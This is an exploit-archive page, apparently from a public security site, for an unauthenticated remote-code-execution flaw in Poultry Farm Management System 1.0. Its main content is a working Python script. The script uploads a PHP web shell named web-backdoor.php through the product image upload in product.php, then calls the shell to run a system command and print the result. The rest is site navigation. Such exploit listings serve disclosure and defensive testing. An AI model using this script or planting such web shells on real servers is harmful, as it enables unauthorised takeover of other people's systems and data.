Poultry Farm Management System 1.0 Shell Upload

Poultry Farm Management System 1.0 Shell Upload: Posted Jun 26, 2024; Authored by Jerry Thomas; Poultry Farm Management System version 1.0 remote shell upload exploit. This is a variant of the original discovery of this flaw in this software version by Hejap Zairy in March of 2022.; tags | exploit, remote, shell; SHA-256 | 4bfd0ca555cbee323c71fce161373924ea70b3917ae27de6e860d7c6278fe543; Download | Favorite | View

Poultry Farm Management System 1.0 Shell Upload

# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
# Date: 24-06-2024
# CVE: N/A (Awaiting ID to be assigned)
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
# Category: Web Application
# Version: 1.0
# Tested on: Windows 10 | Xampp v3.3.0
# Vulnerable endpoint: http://localhost/farm/product.php

import requests
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)

def upload_backdoor(target):
    upload_url = f"{target}/farm/product.php"
    shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"

    # Prepare the payload
    payload = {
        'category': 'CHICKEN',
        'product': 'rce',
        'price': '100',
        'save': ''
    }

    # PHP code to be uploaded
    command = "hostname"
    data = f"<?php system('{command}');?>"

    # Prepare the file data
    files = {
        'productimage': ('web-backdoor.php', data, 'application/x-php')
    }

    try:
        print("Sending POST request to:", upload_url)
        response = requests.post(upload_url, files=files, data=payload,
verify=False)

        if response.status_code == 200:
            print("\nResponse status code:", response.status_code)
            print(f"Shell has been uploaded successfully: {shell_url}")

            # Make a GET request to the shell URL to execute the command
            shell_response = requests.get(shell_url, verify=False)
            print("Command output:", Fore.GREEN +
shell_response.text.strip())
        else:
            print(f"Failed to upload shell. Status code:
{response.status_code}")
            print("Response content:", response.text)
    except requests.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost"  # Change this to your target
    upload_backdoor(target)

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 89 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,079)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,380)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,289)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,663)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

Poultry Farm Management System 1.0 Shell Upload

Poultry Farm Management System 1.0 Shell Upload

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Poultry Farm Management System 1.0 Shell Upload

Share This

Poultry Farm Management System 1.0 Shell Upload

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems